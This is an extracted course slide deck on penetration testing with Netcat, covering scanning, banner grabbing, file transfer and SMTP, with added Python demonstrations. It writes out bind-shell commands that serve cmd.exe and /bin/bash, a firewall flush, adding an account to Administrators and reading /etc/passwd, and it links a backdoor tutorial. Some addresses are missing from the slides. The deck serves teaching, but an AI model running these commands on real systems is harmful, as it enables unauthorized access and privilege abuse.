Pentest with shell script & Perl. Cerutti – IESGF - 2014.


2 Ping broadcast
Look at the mask of your network. The broadcast address is the one that, according to the mask, has every host bit set to 1. For example:
– My IP on the network is
– The mask is
– The broadcast address will be
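
Added worked example (not part of the slides): computing the broadcast address in Python exactly as slide 2 describes it, by keeping the network bits and setting every host bit to 1, and cross-checking the result against the standard library's ipaddress module. The addresses used are constructed values, not the course network's.

```python
# Added example: broadcast address = (ip AND mask) OR (NOT mask), i.e. all host bits = 1.
import ipaddress


def _to_int(dotted):
    """Convert a dotted-quad IPv4 string to a 32-bit integer."""
    parts = [int(p) for p in dotted.split(".")]
    if len(parts) != 4 or any(not 0 <= p <= 255 for p in parts):
        raise ValueError(f"not a valid IPv4 address: {dotted!r}")
    return (parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]


def _to_dotted(value):
    """Convert a 32-bit integer back to dotted-quad form."""
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def network_info(ip, mask):
    """Return network, broadcast, prefix length and usable host count for ip/mask."""
    ip_i, mask_i = _to_int(ip), _to_int(mask)
    host_bits = (~mask_i) & 0xFFFFFFFF
    # A valid mask is a run of 1s followed by a run of 0s, so NOT mask must be 2^k - 1.
    if host_bits & (host_bits + 1):
        raise ValueError(f"non-contiguous mask: {mask}")
    network = ip_i & mask_i              # host bits cleared
    broadcast = network | host_bits      # host bits all set to 1
    return {
        "network": _to_dotted(network),
        "broadcast": _to_dotted(broadcast),
        "prefix": bin(mask_i).count("1"),
        "hosts": max(host_bits - 1, 0),  # minus the network and broadcast addresses
    }


def broadcast_via_stdlib(ip, mask):
    """Cross-check: what ipaddress computes for the same address and mask."""
    return str(ipaddress.ip_network(f"{ip}/{mask}", strict=False).broadcast_address)


if __name__ == "__main__":
    # Constructed sample: a host on a /20 network.
    info = network_info("10.20.33.7", "255.255.240.0")
    print(info, "stdlib agrees:", info["broadcast"] == broadcast_via_stdlib("10.20.33.7", "255.255.240.0"))
```

Pinging the address reported as `broadcast` is what slide 3 shows: every host on the segment that answers broadcast echo requests replies, which is why the same icmp_seq appears more than once in the output.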

3 root# ping
PING ( 56 data bytes
64 bytes from icmp_seq=0 ttl=64 time=0.063 ms
64 bytes from icmp_seq=0 ttl=64 time=30.095 ms
64 bytes from icmp_seq=1 ttl=64 time=0.117 ms
64 bytes from icmp_seq=1 ttl=64 time=17.263 ms

4 Netcat
According to, Netcat is ranked as the eighth favorite network security tool (Nmap Security Scanner Project, 2011).

5 d/14051/nc110.tgz
sudo apt-get install netcat-traditional

6 Disable the firewall
iptables -F (flushes every rule in the filter table; the chains' default policies set with -P are left unchanged)

7 Chat interface

8 Hypervisors

9 Connecting to a port
Connect on any high port, for example TCP port 1234:
$ nc -l 1234
nc is now listening on port 1234 for a connection. On a second console (or a second machine), connect to the machine and port being listened on:
$ nc 1234

10 chat

11 Transferring data with Netcat
-vv (double v) gives additional verbosity, which reports the number of bytes transferred during a file transfer. The -w switch instructs Netcat to wait a given number of seconds before timing out the connection; in our example we specify 30 seconds.

12 Transfer on Mac OS X
nc -v -w 30 -p 1234 -l > secret.txt
Start by using nc to listen on a specific port, with output captured into a file:
$ nc -l 1234 > filename.out
Using a second machine, connect to the listening nc process, feeding it the file which is to be transferred:
$ nc 1234 <
After the file has been transferred, the connection will close automatically.
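
Added example, not code from the slides or from Netcat itself: the listener/sender pair of slides 9, 11 and 12 reproduced with Python sockets so the whole exchange is visible. The listener plays `nc -l PORT > filename.out`, the sender plays `nc -w 30 host PORT < file`, the transfer ends when the sender closes its write side (the automatic close the slide mentions), and the two files are hashed afterwards, because Netcat does no integrity check of its own. Everything runs on 127.0.0.1 on an OS-assigned port; the file content is constructed.

```python
# Added example: a Netcat-style raw TCP file transfer, both ends, with a hash check.
import hashlib
import os
import socket
import tempfile
import threading


def receive_to_file(listener, dest_path):
    """Listener side, the equivalent of `nc -l PORT > dest_path`: accept one
    connection, write everything received to the file, return the byte count."""
    conn, _ = listener.accept()
    total = 0
    with conn, open(dest_path, "wb") as out:
        while True:
            chunk = conn.recv(65536)
            if not chunk:            # peer closed its side: the transfer is finished
                break
            out.write(chunk)
            total += len(chunk)
    return total


def send_file(host, port, src_path, timeout=30.0):
    """Sender side, the equivalent of `nc -w 30 host PORT < src_path`."""
    with socket.create_connection((host, port), timeout=timeout) as conn, \
            open(src_path, "rb") as src:
        conn.sendfile(src)
        conn.shutdown(socket.SHUT_WR)  # send EOF so the listener's recv() returns b""


def sha256_of(path):
    """Hex SHA-256 of a file, read in blocks."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(65536), b""):
            digest.update(block)
    return digest.hexdigest()


def transfer_demo(payload):
    """Run both ends on 127.0.0.1; report sizes and whether the two hashes match."""
    with tempfile.TemporaryDirectory() as tmp:
        src = os.path.join(tmp, "secret.txt")
        dst = os.path.join(tmp, "filename.out")
        with open(src, "wb") as fh:
            fh.write(payload)             # constructed file content

        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))   # port 0: the OS picks a free port
        listener.listen(1)
        port = listener.getsockname()[1]

        received = {}
        worker = threading.Thread(
            target=lambda: received.update(bytes=receive_to_file(listener, dst)))
        worker.start()
        send_file("127.0.0.1", port, src)
        worker.join(timeout=30)
        listener.close()

        return {
            "port": port,
            "sent": os.path.getsize(src),
            "received": received.get("bytes"),
            "match": sha256_of(src) == sha256_of(dst),
        }


if __name__ == "__main__":
    print(transfer_demo(b"top secret\n" * 20000))
```

The hash comparison is the step to keep when doing this with the real nc: the byte count printed by -vv only tells you how much arrived, not whether it arrived intact, and a -w timeout that fires mid-transfer leaves a truncated file with no error on the receiving end.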

13 banner grabbing with Netcat

14 Windows remote shell (and simple post-exploitation hi-jinks)
Preparing the listener:
nc -Lp 31337 -vv -e cmd.exe
Connecting to the target:
nc 31337
– Dir c:/
– Md /invasao
– net localgroup Administrators bob

15 Linux shell
sudo nc -lp 31337 -e /bin/bash
Connecting to the target: As I have demonstrated in the previous exercise, you simply connect to the host (as shown below) and the port that you want to connect to, and the listener will serve up the bash shell for you as follows:
nc 31337
grep bob /etc/passwd

16 Opening web pages on the server
$ printf 'GET / HTTP/1.0\r\n\r\n' | nc 80
(printf is used instead of echo because bash's echo sends the \r\n sequences literally unless given -e, and the server then waits for a request line that never ends.)

17 Sending email
$ nc localhost 25 << EOF
HELO
MAIL FROM:
RCPT TO:
DATA
Body of email.
.
QUIT
EOF
(The line holding a single "." terminates the DATA section; without it the server never accepts the message.)

18 Port scan
$ nc -z 20-30
Connection to 22 port [tcp/ssh] succeeded!
Connection to 25 port [tcp/smtp] succeeded!
The port range was specified to limit the search to ports 20 - 30.

19 ... which server software is running, and which versions. First make a connection, and then break the connection once the banner has been retrieved. This can be accomplished by specifying a small timeout with the -w flag, or perhaps by issuing a "QUIT" command to the server:
$ echo "QUIT" | nc 20-30
SSH-1.99-OpenSSH_3.6.1p2
Protocol mismatch.
220 IMS SMTP Receiver Version 0.84 Ready

20 Open a TCP connection to port 42 of using as the IP for the local end of the connection:
$ nc -s 42
Create and listen on a Unix domain socket:
$ nc -lU /var/tmp/dsocket
Connect to port 42 of via an HTTP proxy at 10.2.3.4, port 8080. This example could also be used by ssh(1); see the ProxyCommand directive in ssh_config(5) for more information.
$ nc -x10.2.3.4:8080 -Xconnect 42

21 Scanning a range of devices with a script
for i in {10..12}; do nc -vv -n -w 1 192.168.0.$i 21-25 -z; done
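
Added example, not code from the slides: a Python version of the port check of slide 18 (`nc -z`), the banner grab of slides 13 and 19 (`echo QUIT | nc -w 1 host PORTS`) and the host loop of slide 21, pointed at two fake local services so it runs offline. The greetings `SSH-2.0-demo_sshd` and `220 demo SMTP Receiver Ready` are constructed, not real software; the replies `Protocol mismatch.` and `221 Bye` are what such services typically send back to QUIT; service ports are assigned by the OS. Run against your own hosts, the report lists what each exposed service announces to anyone who connects, which is the inventory a defender wants.

```python
# Added example: TCP connect scan plus greeting-banner grab, with a per-port timeout.
import socket
import threading

# Constructed banners and replies for the fake local services (not real software).
FAKE_SSH_BANNER = b"SSH-2.0-demo_sshd\r\n"
FAKE_SSH_REPLY = b"Protocol mismatch.\r\n"
FAKE_SMTP_BANNER = b"220 demo SMTP Receiver Ready\r\n"
FAKE_SMTP_REPLY = b"221 Bye\r\n"


def _serve_one(listener, banner, reply):
    """One-shot fake service: greet the first client, read one line, reply, close."""
    conn, _ = listener.accept()
    with conn:
        conn.sendall(banner)
        conn.settimeout(2.0)
        try:
            conn.recv(1024)          # consume the client's QUIT before closing
            conn.sendall(reply)
        except OSError:
            pass
    listener.close()


def start_fake_service(banner, reply):
    """Bind a fake service on 127.0.0.1 at an OS-chosen port; return that port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    threading.Thread(target=_serve_one, args=(listener, banner, reply), daemon=True).start()
    return listener.getsockname()[1]


def scan_ports(host, ports, timeout=2.0, grab_banner=True):
    """Equivalent of `nc -z -w 1 host PORTS`; with grab_banner it also does what
    `echo QUIT | nc -w 1 host PORT` does and keeps the first line the service sent.
    Returns {port: None (closed/filtered) | b"" (open, silent) | first banner line}."""
    results = {}
    for port in ports:
        try:
            conn = socket.create_connection((host, port), timeout=timeout)
        except OSError:
            results[port] = None       # refused or timed out, like nc printing nothing
            continue
        with conn:
            if not grab_banner:
                results[port] = b""
                continue
            conn.settimeout(timeout)   # the -w 1 role: never hang on a silent service
            try:
                conn.sendall(b"QUIT\r\n")
                data = conn.recv(1024)
            except OSError:            # timeout, or the service closed on us
                data = b""
            results[port] = data.split(b"\r\n")[0]
    return results


def scan_hosts(hosts, ports, timeout=2.0):
    """The for-loop of slide 21: the same port list against several hosts."""
    return {host: scan_ports(host, ports, timeout) for host in hosts}


def demo():
    """Start the two fake services, pick a port nothing listens on, scan all three."""
    ssh_port = start_fake_service(FAKE_SSH_BANNER, FAKE_SSH_REPLY)
    smtp_port = start_fake_service(FAKE_SMTP_BANNER, FAKE_SMTP_REPLY)
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                      # released again, so a connect is refused
    report = scan_hosts(["127.0.0.1"], [ssh_port, smtp_port, closed_port])
    return report["127.0.0.1"], ssh_port, smtp_port, closed_port


if __name__ == "__main__":
    results, *_ = demo()
    for port, banner in sorted(results.items()):
        state = "closed" if banner is None else (banner.decode(errors="replace") or "open")
        print(f"127.0.0.1:{port} -> {state}")
```

The timeout on both the connect and the read is what makes the loop finish: a filtered port or a service that waits for the client to speak first would otherwise block the whole run, which is the same reason the slide's one-liner carries -w 1.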

22 Official sites
Unix Netcat Homepage:
GNU Netcat Project:
Ncat – The Nmap Project:

23 Articles and tutorials
Offensive Security explains how to create a persistent back door using Netcat and Metasploit's Meterpreter: Netcat_Backdoor
Crazy Netcat Relays for Fun and Profit: Ass_Netcat_Relays_for_Fun_and_Profit
SANS Institute Netcat Pocket Cheatsheet: v1.pdf
Some interesting use cases not covered in this book, by Johannes Franken:
A great reference on using Netcat to debug SOAP and XML web services: web-services/

